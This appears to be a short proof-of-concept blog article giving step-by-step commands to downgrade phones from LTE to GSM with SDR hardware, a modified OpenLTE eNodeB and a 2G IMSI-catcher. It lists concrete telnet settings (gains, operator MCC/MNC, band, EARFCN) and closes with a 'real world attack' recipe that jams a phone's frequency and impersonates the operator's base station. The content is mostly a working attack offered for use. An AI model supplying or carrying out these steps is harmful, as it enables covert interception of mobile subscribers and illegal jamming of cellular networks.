LTE Redirection Attack – RF-eXploring

Redirect attack from long term evolution (LTE 4G) to global system mobile (GSM 2G):
Tested with :
- LimeSDR-Mini + 2 Motorola (C1XX series osmocom-bb compatibles)
- BladeRF-xA4 + 2 Motorola
- BladeRF-xA4 + LimeSDR-Mini
Kali Linux 2019.4 (Gnome AMD64) (Docker)
Then build 2G IMSI-Catcher Build IMSI-catcher
Running Phone in 2G/3G/4G mode
This article is in progress and is just a PoC
The attack step are run the IMSI-catcher into arfcn 514 follow
(see Build IMSI-catcher)
run the 4G redirector as follow
Shell #1
# LTE_fdd_enodeb
Shell #2
# telnet localhost 30000
write rx_gain 30
write tx_gain 80
write mcc 208
write mnc 15
write band 7
write dl_earfcn 3350 (change with your ue values be careful that the earfcn is in the band)
Then switch the phone in airplane mode and in localhost:30000 (Shell #2)
and when you have "ok" answer in shell #2 remove airplane mode and ... enjoy !
PS:for real world attack (without switching airplane mode) :
You have to gather some informations :
     -> you have to jam the freq of the ue (freq1) then when you know the hopping freq of the ue (freq2)
Then wait to the phone to come back to main freq and :
     -> you have to run enb redirector (openlte modified) with freq2 mcc mnc and tac close to the real tac
     -> then enb jammer (srslte non modified) with mcc mnc and freq1
    ... and here we are good!